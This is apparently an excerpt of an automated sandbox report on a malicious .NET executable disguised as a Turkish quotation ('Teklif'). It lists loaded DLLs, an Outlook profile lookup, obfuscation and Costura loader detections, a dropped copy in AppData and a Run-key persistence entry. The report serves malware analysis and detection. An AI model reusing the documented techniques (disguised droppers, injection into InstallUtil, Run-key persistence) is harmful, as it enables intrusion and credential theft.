                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2477328871.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000004.00000002.2446673623.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2558909751.0000000003977000.00000004.00000800.00020000.00000000.sdmp, Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002A78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmp, Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, g36spvPwU0M3Ss1qIRI.cs.Net Code: Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777259)),Type.GetTypeFromHandle(EhIm2WlCnmZKGsw35uE.Ilwox0q1P9(16777263))})
                      .NET source code contains potential unpacker
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.58d0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3f03bc0.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5860000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3e25f60.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_057C0D13 push eax; iretd 0_2_057C0D1D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_057C2EA7 push esp; retf 0_2_057C2EA8
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_0596D1F2 push ebp; retf 0_2_0596D24D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_059875F3 push es; retf 0_2_059875FE
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05989134 pushfd ; ret 0_2_0598913D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05985F92 pushfd ; ret 0_2_05985FA1
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05987AF3 push ss; iretd 0_2_05987AFB
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A061D9 pushfd ; ret 0_2_05A061DC
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A06D6E push ecx; ret 0_2_05A06D74
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05A0363A pushfd ; retf 0_2_05A0363D
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeCode function: 0_2_05C71700 pushfd ; iretd 0_2_05C71701
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_062B2EA7 push esp; retf 4_2_062B2EA8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06343CF1 push es; ret 4_2_06343D18
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0642F770 push es; ret 4_2_0642F780
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0645C4E8 push es; retf 4_2_0645C4F4
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06477AF3 push ss; iretd 4_2_06477AFB
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06475F9D pushfd ; ret 4_2_06475FA1
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0647D09E push ds; iretd 4_2_0647D0A5
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06479130 pushfd ; ret 4_2_0647913D
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064775F3 push es; retf 4_2_064775FE
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064F363A pushfd ; retf 4_2_064F363D
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064F6D73 push ecx; ret 4_2_064F6D74
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_064F61D9 pushfd ; ret 4_2_064F61DC
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_06761700 pushfd ; iretd 4_2_06761701
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 4_2_0676001B push es; iretd 4_2_0676001C
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05B92EA7 push esp; retf 5_2_05B92EA8
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2E42B push cs; iretd 5_2_05C2E432
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2E429 push cs; iretd 5_2_05C2E42A
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05C2E3E0 push cs; iretd 5_2_05C2E3E2
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D015D8 push edx; iretd 5_2_05D015DA
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeCode function: 5_2_05D01768 push ebx; iretd 5_2_05D0176A
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, A2TGPDlILfKo8xWJaMF.csHigh entropy of concatenated method names: 'mRulxF6eZO', 'LcjloiT03V', 'bwjl0iwDN3', 'HpVlr5EC8e', 'LCAlcq03X6', 'NpwlQutL82', 'w5DlKITKGL', 'frOlGqa3Hr', 'fPrlh52W7i', 'YuRlffHmfG'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, bJPGYqaOXJdGcbquJuV.csHigh entropy of concatenated method names: 'dyCaolcUDb', 'CghqbZUKvxsAndMHiwf', 'tYNZ4iUGfn9hQ91FqNY', 'NfppTDUhDt8MBvHW65m', 'OoF37pUfMLraqYZwdTG', 'i2O8AqU9s60kfoDH33T', 'Gt6JgcUAhD8BP2tSlSx', 'pg3G4fUMAsmrv34MwyK', 'jtQEoYUEh13PY3sWiLZ', 'Gum8O9UdMRANIoCY2qW'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, Ahr2o8PZutq2IM4P9Vk.csHigh entropy of concatenated method names: 'AbrPHtBo4D', 'Y6SaQ2sJEeRAD7Blhff', 'k4hTIHsNQciKpM2OTxT', 'o5aPgSsZ9E1TyDtHK6r', 'jgsOWZsBEZhsjpHcZtL', 'LdQP6ysH3xvr1C0TVY1', 'LXSKKasTFVAmu7HqZhV', 'FGSbQFsDLZaJvroHHYh'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'PEimRsseBfTusqraovp'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, DyJrVrPC7pSV1POds8K.csHigh entropy of concatenated method names: 'gHUotlFmAP', 'rJJsc6ean7pZGkF4TAl', 'sQWqQwePE9C5GT7LqbR', 'wsfGKAe6XgRmeX6Nh7X', 'J4A6hMelKEtg60mgDj4', 'JQHANRevtmoC11gMMor', 'CbqL6Je3dllI3BALkhX', 'IF9PG3e1gwpb2TQlrnM', 'JG8tUse7jsO05vJBg1K', 'A3iWKFeS4HnQUih1qul'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, eVCAYBqJIfCwSRvDqZt.csHigh entropy of concatenated method names: 'SvNqZrryss', 'JdsqB0Uy93', 'F9NhUSws2NGY3BWNGrN', 'MqN5fSwUw7sZBqTA0QP', 'z1dEYhw21dh7fXX2i3v', 'MvW1tnweRaQURFBVNNM', 'JCDnUXwm9cv2ep0DJfP', 'KLiIl7wREoHs1vFncc0', 'A2R68VwtVIfIy4tPslO', 'y7gMidwgRYTIlMNs7FF'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, H4A50APTNSdStNWZp1R.csHigh entropy of concatenated method names: 'ppWPJ6gnHu', 'XsyPNGuKPD', 'AXfaGbsPrcXbPU4HFsa', 'sslEuMs6INig4c4yq0O', 'OBOlhjslE1WeqCe2DZQ', 'PCvFurs1BpXJNavMFBB', 'FA7IQusas17RC5GDLl8', 'Ok9I6VsvMM5242CIfU7', 'GYx9Zis7r7d1oLOpodj', 'FS8TBwsSgbvJuLtaVDt'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, ao0mCGVXhw4RaqLaDVU.csHigh entropy of concatenated method names: 'xZVVj2U8ub', 'OMDVqosEmy', 'lCkV30kWJI', 'PIGVaXJVJq', 'NTHVPaVJ7G', 'zmXV6KDYuN', 'omVVlO64b2', 'OylVvZJin6', 'V2kV7qKqJN', 'OGFVSE0Wtt'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, EjU8RrP7WYhkQPMDp3K.csHigh entropy of concatenated method names: 'I10PYAWVSn', 'i3IXYls43wXgqKoylIO', 'sXoZthsX7nRvBqKIP8f', 'gq5O2jsLiefwlefmnIJ', 'rBFbbIsjSGJ2r7RYL33', 'sYGXSPspOiqSZVxl9hw', 'oh7HZcsqgipfSN8U433', 'SEav4bsVToYgaTqjrKZ', 'bC1vDr2kgPCBFQhheM8', 'LYcRJv2zb7Gc2AVqYpk'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, VAugF3aiNmxtSjgqUa1.csHigh entropy of concatenated method names: 'glfanpBMiL', 'uOPawRodRe', 'Kl60UoFyJVIpmaMLrOi', 'YJojRpFbxOH26gyUT5J', 'nZJnXGFklnHb7K9jbik', 'xpY2qVFz1FoROtAEnms', 're0eLmU4VdWIDcJVsqk', 'fjmM12UXbnEgsxnF3Fr', 'h4q76eULef4HdgikxPV', 'YvTNb4UjJV9sjgjmmMd'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, MLoZuhaDvZAqoaI65l2.csHigh entropy of concatenated method names: 'lU9aNZndLV', 'KTicXCFR0KZYeo0olRK', 'MeqOfeFtvR1jLc84AfA', 'aIdHyiFg30DFHoGsjYD', 'i9dUYiFOP0cyD4UqSww', 'fsJNcXFxpM4byOaK7qL', 'NBlcudFe6DhXeGV5x0i', 'uHHX0BFmdGZVZ0yvJhI'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, CmtwiWadDLChEtUXqqp.csHigh entropy of concatenated method names: 'BUTabC5AWR', 'wtaakdRgJk', 'fUiP4VW26L', 'cP4yyG2Ze70851I3ER0', 'LrliAg2JGdMj8VfiYFj', 'ceSAlc2NPg89tLGK5nu', 'pxtxER2BwK4QxuoSVqX', 'XEVmCs2HSQJDl0nUHeL'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, CggNYUa5rSGKEPDBahl.csHigh entropy of concatenated method names: 'JmtaC7766R', 'JCjcIYFGq6ChCMt11R3', 'Ls0aQZFhbGEPNN5UuNX', 'KmOYatFfo0cfdLwjcO3', 'khesrCF9NYOr1cZQqCU', 'AAd0dMFApFGonJqr4Hx', 'oKQaJoFM4JvLUvBT1KB', 'nG0aLKFE9Hwr14Fw8Wm', 'c9BORvFQccql0khjAmZ', 'YnQyfBFKpkN2IN4cBj4'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, zhgEEmah4Tokbnc2K5v.csHigh entropy of concatenated method names: 'k8Xa9EHu3a', 'gZhaM28cAn', 'z44aAXUoCD', 'cqO0n02vW7MgjNOkm3W', 'sPAVpo27HdZ1lUPt9xt', 'tBmJuh26gcxdK2U2uqo', 'wIBtiG2lSrhds6ipX5G', 'v0E4e12SbIpANeZflGE', 'fNaY5n2YeknIxehjrTp', 'KX3miS2TuQQQWw9b3JY'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, c4NYreaQ7ruyRbNVyYI.csHigh entropy of concatenated method names: 'IMFaGnRjhW', 'MkNjZ72Vn9JPs1ZiSQo', 'uc5PF5237jJ7pXdaXIL', 'DwmycU21lJLBwXnGM0b', 'ifh5Dm2au538RMjYvDU', 'qryNb62plK9pf9YiLLN', 'JMglW72qHtte2DLyvnD'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, D8lG7AaIVmtrNqjgEGn.csHigh entropy of concatenated method names: 'GeWaFklf5N', 'SLT98cUnFUDo66IurJF', 'Q9BI3oUwnscEfkbcewu', 'HHclJLUIKBBSMkeRAFt', 'rWwsbiUWMJkX76wHehu', 'kYjV0vUFT9AvLN3hKKf', 'fYXbESUUYpZZ6OqrEFW', 'Eq2327U27XnZKX9Ic7N', 'uoGnKRUi1WlVowDuGLB', 'bZJSMXU8JpnBogp1UO5'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, Vv3JBgqCrcMO6BUi9HH.csHigh entropy of concatenated method names: 'g0Iq83UnwP', 'dbrqnRbywW', 'F8WqwCUXv1', 'p0FqIaJ4Ak', 't5aqWnpTb4', 'IluO50whoYpFWyUk2nS', 'h269IswfSEGtKRi1dga', 'KRcpFcw9aqd2ArU2QOn', 'eoJurfwAvDCZtMdZZuN', 'cuqkTIwMVSc2yq9bXdE'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, S9NKJeaUZZ6gpKOSMiv.csHigh entropy of concatenated method names: 'A6tamtNgLg', 'fduaRjc2Rd', 'o3aasiwrLk', 'BKBaePLLNS', 'HaTRhEUR4xjvpqgYPcm', 'jJ8X4wUtfyUqDRUw5p5', 'NXtaeKUgychCnSR8Rie', 'JhHE7ZUO5ZE9Ed29Qym', 'dugMiVUxD6kObG0McuL', 'm2xFSWUokxiDor41eSj'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, vXmvU15gDUWAJphStg.csHigh entropy of concatenated method names: 'ok0CBNwod', 'WsZivnPGo', 'FpHnlUpQi', 'PI68uqKwf', 'Ms04SR8kvdL7gI3CR7Q', 'jkGbd68zBV2XTqKvUa3', 'XEFKnZn4EBHkn4EsyCe', 'g2UBDk8y4o1AEnGjqjL', 'r3x8no8bXyj2udVu5O9', 'Rjs7ebnXdq8pHmoSBHW'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, lOPQPcViOpPXCosc4bJ.csHigh entropy of concatenated method names: 'n3IVUVTfeF', 'cJ2uvBWxumRBQY2gCJE', 'PTZ9eyWgbu2CC1KAPOa', 'vaqifIWOlnl4kAN5UJ8', 'oqEeyRW2Tm4J4OoDEKo', 'hoGrnNWs8yj10t1YPpF'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, Gqfrh5VJhZISS6rJnaN.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'rT0VZfMBok', 'NtProtectVirtualMemory', 'LFJZ1gWiNtxaPgs03nt', 'yKPyRNW8IiXDTbOK19D', 'rNGYriWuRnddapUpTJm', 'trarFUWCfJQkqdaBqOv'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, z1QJOsl9E2n03chvqxN.csHigh entropy of concatenated method names: 'NhgJDU9MH2', 'WSmJJLFdyc', 'u7KJNbLQiX', 'c2eJZAvPwi', 'Wg0JBbkfbO', 'SbdJHExlqI', 'RGmJ57syvU', 'syMvTnkIXH', 'zc0Juo7h5V', 'lIuJCNyG7x'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, LfOAbsqFWHYwCprfEjf.csHigh entropy of concatenated method names: 'F9Iq229Xvm', 'ra9qs7F7W9', 'FChqe3PSY2', 'DANIFDIIplod7lMaoi3', 'qkYyRnInCWH0tkENrvr', 'zRKF1IIwSKDvKNObc6K', 'jY9vnZIWaxIWpKRZPlV', 'VOoTP0IFb55pHo9ejGH', 'ex9iiLIULsUMlkMdKNI', 'ARleqdI22FKhiJIRmWV'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, mhuaUUPPen6ybxPOonB.csHigh entropy of concatenated method names: 'UkcPlE0fwY', 'GHjPvtNkZT', 'rlo7Tb2grPfLTpScChr', 'rOtLYj2RvlNOAWeqrFT', 'IN6X5E2tSXmRhHd3Ma4', 'OYViA42O2grvqnfKQM2', 'iwC3Pi2x0Ze7yD778wB', 'SAA7wh2oRAgC8MZGB9E', 'PZXeU6201WTlDO5jOdr', 'uFZV5k2rUZeKSK8BlXv'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, Kgc7Pdv5xC0rTy0Uva.csHigh entropy of concatenated method names: 'LreYWS6oa', 'XiHTQUReY', 'qqOJWFRXx', 'CW6NjHqX9', 'qDZSjGIk6', 'doYliA8KhFgbpcWNCfI', 'S05sSD8G3CpBfhOxawM', 'KuRSFm8h5dus0a9GXSs', 'd9wH798fTqFTbMNy3wE', 'R6kSMD89K2qBfPysxDA'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, g36spvPwU0M3Ss1qIRI.csHigh entropy of concatenated method names: 'vEoklPeZCspQeEH19sJ', 'zYrPZ2eBM96LOnZbt9e', 'lCblpVxkZd', 'GZFJlseCXd33yblNA9t', 'r5fOZJei0VaS8ZiMHE5', 'akDTnre8CDmbwK3MySa', 'Lu7tGwenBEfiLC0fELs', 'RpdLFUewBmuSoeGgwq3', 'uikwVWeIyxoJG58U1ED', 'P0VH0CeWAUseh1k7k60'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.3c56210.7.raw.unpack, SANZmvLDF4grS6FTrZ2.csHigh entropy of concatenated method names: 'A5GLNdrVlc', 'hll7OrnWitjbqpfw7Rw', 'WwCehKnFtZIbx5slFRS', 'L5qky4nUt96ZVw7LsTZ', 'hI0eatn2JxcZRAacM7b', 'h26suFnsfqXaHV4V7EC', 'Bug9F3nesxndXq3IPcK', 'VFD5pBnmmuOyjAupMVy', 'pvpf1vnRUlPT7qxfukY', 'XOn21intm8r5IUElpYB'
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeFile created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PtqlzgvzpfaJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PtqlzgvzpfaJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
